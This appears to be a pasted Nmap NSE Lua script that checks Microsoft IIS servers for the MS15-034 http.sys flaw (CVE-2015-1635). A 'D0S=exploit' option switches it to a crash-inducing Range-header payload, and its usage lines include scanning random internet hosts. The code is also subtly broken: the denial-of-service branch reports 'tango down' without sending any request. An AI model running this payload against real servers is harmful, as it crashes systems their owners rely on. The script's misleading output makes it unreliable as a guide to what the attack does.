ms15-034.nse (http.sys vulnerability check/exploit)

r00t-3xp10it Jun 15th, 2015 (edited) 899 Never
 
  1. -- Original nse module written by: DigitalStroopwafel
  2. -- Install: copy this script into the Nmap script directory: /usr/share/nmap/scripts
  3. -- Update database: sudo nmap --script-updatedb
  4. -- Usage: sudo nmap --script-help ms15-034.nse
  5. -- Usage: sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target>
  6. -- Usage: sudo nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  7.  
  8.  
  9. -- Dependencies (Lua libs)
  10. -- all of these libraries ship with a default Nmap installation.
  11. local http = require('http')
  12. local string = require('string')
  13. local shortport = require('shortport')
  14. local stdnse = require ('stdnse')
  15. local vulns = require ('vulns')
  16.  
  17.  
  --- Free-form help text printed by `nmap --script-help ms15-034.nse`.
  -- Plain text only (no code); kept verbatim.
  description = [[

author: DigitalStroopwafel, r00t-3xp10it
Detects for the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers. and exploit
it using script args (--script-args D0S=exploit) or we can scan further using another
argument (--script-args uri=/wellcome.png), Affected versions are Windows 7, 8,
8.1, Windows Server 2008 R2, 2012 and 2012R2.

Some syntax examples:
nmap -sV -Pn -p 80 --script vuln <target>
nmap -sV -Pn -p 80 --script ms15-034.nse <target>
nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri <target>
nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script ms15-034.nse -oN /root/nmap-report.log
]]
  34.  
  35. ---
  36. -- @usage
  37. -- nmap --script-help ms15-034.nse
  38. -- nmap -sV -Pn -p 80 --script vuln <target>
  39. -- nmap -sS -Pn -p 80 --script ms15-034.nse <target>
  40. -- nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri/ <target>
  41. -- nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
  42. -- nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  43. -- @output
  44. -- PORT   STATE SERVICE
  45. -- 80/tcp open  http
  46. -- |_ms15-034: http.sys its Vulnerable
  47. -- |   State: VULNERABLE
  48. -- |     IDs: CVE-2015-1635
  49. -- |     Response: 416 (exploitable)
  50. -- |     Disclosure date: 2015-06-17
  51. -- |     Author: DigitalStroopwafel(module)
  52. -- |             r00t-3xp10it(review)
  53. -- |
  54. -- |     Description:
  55. -- |     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on
  56. -- |     HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,
  57. -- |     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.
  58. -- |     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>
  59. -- |     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd
  60. -- |
  61. -- |     References:
  62. -- |     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
  63. -- |     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
  64. -- |     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd
  65. -- |_
  66. -- @args ms15-034.uri URI to use in request. Default: /
  67. -- @args ms15-034.D0S exploit the Denial-Of-Service condition
  68. ---
  69.  
  70.  
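  -- NSE script metadata read by the Nmap script engine.
  author = "DigitalStroopwafel, r00t-3xp10it"
  license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
  categories = {"vuln", "dos"}



  -- THE RULES SECTION --
  -- portrule = shortport.http [added port number and service to portrule]
  -- shortport.port_or_service takes the service names as one name or a table
  -- of names, each compared as a whole against the detected service; the
  -- previous single string "http, https, ipp, vnc" could therefore never match,
  -- so only the numeric port list ever triggered the rule. Passing a table
  -- makes the service half of the rule effective.
  portrule = shortport.port_or_service({80, 443, 631, 5800}, {"http", "https", "ipp", "vnc"}, "tcp", "open")
  -- local uri = "/" [updated to use script arguments (anotheruri)]
  -- Request path; overridable via --script-args ms15-034.uri=<path>, defaults to "/".
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"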
  82.  
  83.  
  84. -- THE ACTION SECTION --
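  --- Script action: sends a single GET with an oversized Range header and
  -- reports whether the reply carries the HTML title that the script treats
  -- as the MS15-034 / CVE-2015-1635 indicator.
  -- @param host Nmap host table.
  -- @param port Nmap port table selected by portrule.
  -- @return Report string, or nil when no usable HTTP response came back.
  action = function(host, port)
    local options = {header={}}
    options['header']['User-Agent'] = "Mozilla/5.0 (compatible; EvilMonkey)"
    options['header']['Host'] = stdnse.generate_random_string(8)


    -- special thanks to 'sathisharthars' POC 'https://goo.gl/lVO1x3'
    -- change this script range byte from "0-" to "18-" to exploit D0S
    -- using script args to run denial-of-service or scanning for vulnerability
    local D0S = stdnse.get_script_args(SCRIPT_NAME..".D0S")
    if (D0S == "exploit") then
      options['header']['Range'] = "bytes=18-18446744073709551615"
      return "Executing Denial-Of-Service Condition...\nstatus  : please ping target to comfirm tango down..."
    else
      options['header']['Range'] = "bytes=0-18446744073709551615"
    end


    -- get response from target website
    local response = http.get(host, port, uri, options)
    -- A timeout, reset or non-HTTP reply leaves body/status unset; without this
    -- guard string.match on a nil body (or ".." on a nil status below) raises a
    -- Lua error and the script aborts instead of reporting nothing.
    if not response or response.body == nil or response.status == nil then
      stdnse.print_debug(1, "%s: no usable HTTP response from %s:%d", SCRIPT_NAME, host.ip, port.number)
      return nil
    end
    local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")

    -- display target response (script output)
    -- NOTE: the verdict is based on the <title> text only; response.status is
    -- printed in the report but is not itself compared against 416.
    if ( title == "Requested Range Not Satisfiable" ) then
      return "http.sys its Vulnerable\n   State: VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (exploitable)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n     Description:\n     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on\n     on HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,\n     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.\n     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>\n     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd\n\n     References:\n     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635\n     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx\n     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd\n\n"
    else
      return "http.sys not Vulnerable\n   State: NOT VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (we need: 416)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n"
    end
  end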